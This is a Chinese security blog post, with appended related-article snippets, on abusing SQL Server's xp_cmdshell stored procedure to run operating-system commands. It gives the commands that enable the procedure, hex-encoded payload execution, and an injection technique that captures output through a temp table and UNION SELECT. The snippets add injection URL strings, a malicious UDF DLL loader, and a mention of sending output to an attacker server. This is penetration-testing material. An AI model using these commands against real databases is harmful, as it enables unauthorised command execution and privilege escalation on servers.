MSSQL-xp_cmdshell 的利用

最新推荐文章于 2025-03-29 21:49:17 发布
最新推荐文章于 2025-03-29 21:49:17 发布
阅读量1.4k 收藏
点赞数
分类专栏: web hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/eT48_sec/article/details/42523331
版权
本文详细介绍了SQL Server中的xp_cmdshell扩展存储过程,包括其用途、语法、如何启用及潜在的安全风险利用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一.关于xp_cmdshell

xp_cmdshell是用于执行Windows命令的一个扩展存储过程。

xp_cmdshell 生成的 Windows 进程与 SQL Server 服务帐户具有相同的安全权限。

 自SQL Server 2000后,默认情况下,xp_cmdshell 选项在新安装的软件上处于禁用状态,但是可以运行 sp_configure 系统存储过程来启用它。

二.xp_cmdshell的语法

xp_cmdshell { 'command_string' } [ , no_output ]

'command_string' 包含要传递到操作系统的命令字符串。command_string 的数据类型为 varchar(8000) 或 nvarchar(4000),无默认值。command_string 不能包含一对以上的双引号。如果 command_string 中引用的文件路径或程序名中存在空格,则需要使用一对引号。

no_output可选参数,指定不应向客户端返回任何输出。

三.启用xp_cmdshell

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

四.xp_cmdshell的利用

1.将要执行的命令先进行十六进制转换然后保存到变量中,最后再执行。

declare @shellcode varchar(600);set @shellcode=0x48inputyourpayload;exec master..xp_cmdshell @shellcode

2.将命令执行结果输出到文件中

DECLARE @cmd sysname, @var sysname
SET @var = 'dir/p'
SET @cmd = @var + ' > dir_out.txt'
EXEC master..xp_cmdshell @cmd
3.将命令执行结果输出到临时表中 

CREATE TABLE sqlmapoutput(id INT PRIMARY KEY IDENTITY, data NVARCHAR(4000))
DECLARE @ugye VARCHAR(8000);SET @ugye=0x77686f616d69;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @ugye
union select null,null,data from sqlmapoutput where id = 1
DROP TABLE sqlmapoutput






SQL Server数据库xp_cmdshell提权笔记
千寻的博客
06-04 3312
SQL Server数据库xp_cmdshell提权
MSSQL注入利用xp_cmdshell执行命令(细)
墨痕诉清风的博客
04-28 2119
与MySQL不同,MSSQL提供了,它允许我们执行系统命令xp_cmdshell中,大多数时候我们都有特权使用cmd,最重要的是,使用powershell。现在,我们将在powershell中使用curl将命令输出发送到我们的受控服务器。
SQL中xp_cmdshell的用法
gly1653810310的博客
03-04 1909
SQL中xp_cmdshell的概念和应用
MSSQLxp_cmdshell利用
最新发布
fcx_666666的博客
03-29 441
拿到SQL注入不知道怎么提升危害?本文教你如何在拥有对mssql数据库操作的权限下通过XP_cmdshell拿到shell
xp_cmdshell 应用
vegas_zheng的专栏
03-20 819
xp_cmdshell xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串, 并以文本行方式返回任何输出,是一个功能非常强大的扩展存贮过程。    一般情况下,xp_cmdshell对管理员来说也是不必要的,xp_cmdshell的消除不会对Server造成 任何影响。    可以将xp_cmdshell消除:    Use Master    E
mysql xpcmdshell_SQL入侵恢复xp_cmdshell方法总结
weixin_36256447的博客
01-19 707
恢复xp_cmdshell SQL Server阻止了对组件 'xp_cmdshell' 的过程'sys.xp_cmdshell' 启用1433 SQL入侵恢复xp_cmdshell方法总结sql server 2005下开启xp_cmdshell的办法EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configur...
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,...
数据库提权-mssql通过xp_cmdshell提权
cxrpty的博客
03-12 4597
实验思路:1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比 管理员小;而在2003以上的版本,则为最高权限。 ⭐ 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使用sa连...
110.网络安全渗透测试—[权限提升篇8]—[Windows SqlServer xp_cmdshell存储过程提权]
qwsn
07-05 3483
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,可以开启xp_cmdshell存储过程,以sqlserver的身份执行系统命令。但是不一定是系统权限,还要看管理员在一开始安装sqlserver的权限设置。(1)xp_cmdshell存储过程【存储过程是:已预编译为一个可执行过程的一个或多个SQL语句的集合】,它是用来执行本机的cmd命令的,要求系统登陆有sa权限。默认情况下,sql serve
mysql xp_cmdshell_SQL xp_cmdshell
weixin_30141547的博客
02-03 569
下面是编程之家 jb51.cc 通过网络收集整理的代码片段。编程之家小编现在分享给大家,也给大家做个参考。GO---打开xp_cmdshellEXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGUREGO---创建文件夹declare @shellComm...
MSSQL利用xp_cmdshell 写Debug Log程序
sen_shan的专栏
12-12 775
在写存储过程时,调试程序经常用PRINT或Table记录log,Table在事务提交在相对复杂,PRINT在查询分析器中有效,后端程序调用无法看到效果,针对此问题想到利用xp_cmdshell写Debug Log
mysql xpcmdshell_MSSQL入侵恢复xp_cmdshell方法总结
weixin_39888180的博客
01-19 747
MSSQL弱口令入侵已经很罕见了,但在内网时有时还能用到,今天在搞机器的时候遇上一MSSQL2005,第一次见这错误信息,搜索到答案,贴在BLOG上以后遇上备用.-----------------------------------------------------------------------------------------------------------错误信息:SQL Ser...
MSSQL提权之xp_cmdshell
himyly的博客
11-22 1276
sqlserver中通过xp_cmdshell进行渗透的过程
数据库提权,Mssql xp_cmdshell提权
luSaMa的博客
07-06 2680
针对Mssql xp_cmdshell提权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法提权。数据库提权的方式也不止有Mssql xp_cmdshell一种,之后更多的提权方式也是我更应该学习的地方。
xp_cmdshell 理解和应用
jianzhiying的专栏
03-10 3190
xp_cmdshell     以操作系统命令行解释器的方式执行给定的命令字符串,并以文本行方式返回任何输出。授予非管理用户执行   xp_cmdshell   的权限。             说明     在   Microsoft®   Windows®   95   或   Microsoft   Windows   98   操作
sql注入之——mssql(sqlserver)执行系统命令
wsnbbz的博客
02-12 5671
原理 利用xp_cmdshell扩展存储过程,此存储过程可以直接执行系统命令 开启xp_cmdshell扩展存储过程 ?id=1;use master;exec sp_configure ‘show advanced options’,1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure; 执行系统命令 ?id=1;use mas...
xp_cmdshell简单介绍
nekopoch的博客
01-17 2786
简介 xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 用于运行命令行(cmd)。 这对于使用T-SQL在操作系统中运行诸如复制文件,创建文件夹,共享文件夹等任务非常有用。 (45条消息) 如何使用xp_cmdshell扩展过程_culuo4781的博客-优快云博客 相关命令 命令命令基本上都可用 以下只列出来部分 dir 查看文件目录 相当于linux的ls type 显示文本内容 type [drive:] [pa
利用Xp_Cmdshell取得服务器的管理权,很可怕的SQL注入
热门推荐
lee576的专栏
07-17 1万+
MSSQL中具有sysadmin权限的用户可以通过xp_cmdshell存储扩展以system的权限执行任意系统命令,因此大多数对安全比较重视的管理员都会将它删除,即使没有删除也有可能会由于获得的权限不足而前功尽弃。因此获得了xp_cmdshell的执行权限也就成了大多数SQL Injection攻击方法的终极目标。我给大家介绍一下在此过程中涉及到的几个关键问题及其解决方法。权当是抛砖引玉。
mssql拿shell
03-22
### MSSQL 提权或执行命令的方式 #### 使用 `xp_cmdshell` 执行系统命令 `xp_cmdshell` 是 Microsoft SQL Server 中的一个扩展存储过程,允许直接调用操作系统命令并返回其输出。此功能在早期版本(如 MSSQL 2000)中默认启用,但在 MSSQL 2005 及更高版本中,默认情况下被禁用[^2]。 如果目标数据库启用了 `xp_cmdshell`,可以通过以下方式执行命令: ```sql EXEC master..xp_cmdshell 'whoami'; ``` 当 `xp_cmdshell` 被禁用时,可以尝试通过管理员权限重新启用它。具体操作如下: 1. 启用高级选项配置: ```sql EXEC sp_configure 'show advanced options', 1; RECONFIGURE; ``` 2. 启用 `xp_cmdshell` 配置项: ```sql EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; ``` 完成上述步骤后即可再次使用 `xp_cmdshell` 来执行任意系统命令。 #### 利用自定义函数加载 DLL 文件 另一种方法是创建一个基于外部动态链接库 (DLL) 的用户定义函数 (UDF),从而实现命令执行的目的。例如,假设存在名为 `udf.dll` 的恶意 DLL 文件位于路径 `C:\windows\` 下,则可通过以下脚本将其注册至数据库并运行指定命令: ```sql CREATE FUNCTION cmdshell(@cmd NVARCHAR(4000)) RETURNS STRING SONAME 'udf.dll'; SELECT dbo.cmdshell('whoami'); DROP FUNCTION cmdshell; ``` 这种方法依赖于能够成功上传所需的 DLL 文件以及具备足够的权限去修改服务器上的文件系统结构[^3]。 #### 借助 Memcached 获取额外信息 除了直接针对 MSSQL 进行攻击外,还可以探索其他可能暴露的服务作为辅助手段。比如题目提到的 memcached 服务监听在 11211 端口上。Memcached 主要用于缓存数据对象到内存之中,并支持简单的 key-value 存储机制。假如能够访问远程主机上的此类实例,则有机会读取其中保存的数据片段甚至定位更多潜在漏洞位置[^4]。 尽管如此,请注意实际渗透测试过程中应当遵循合法授权范围内的活动准则,切勿非法入侵他人计算机信息系统! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值